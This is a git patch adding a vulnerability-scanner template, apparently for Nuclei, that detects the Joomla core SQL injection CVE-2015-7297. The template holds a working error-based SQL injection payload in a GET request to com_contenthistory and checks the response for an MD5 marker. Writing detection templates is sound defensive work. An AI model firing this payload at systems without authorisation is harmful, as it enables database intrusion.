From e314a1273b4125d814ec863e40c02cac47315328 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 22:22:11 +0530 Subject: [PATCH] Create CVE-2015-7297.yaml --- cves/2015/CVE-2015-7297.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cves/2015/CVE-2015-7297.yaml diff --git a/cves/2015/CVE-2015-7297.yaml b/cves/2015/CVE-2015-7297.yaml new file mode 100644 index 0000000000..b42e4ae2f7 --- /dev/null +++ b/cves/2015/CVE-2015-7297.yaml @@ -0,0 +1,19 @@ +id: CVE-2015-7297 +info: + name: Joomla Core SQL Injection + author: princechaddha + severity: high + description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. + reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html + tags: cve,cve2015,joomla,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)" + + matchers: + - type: word + words: + - "cf79ae6addba60ad018347359bd144d2" + part: body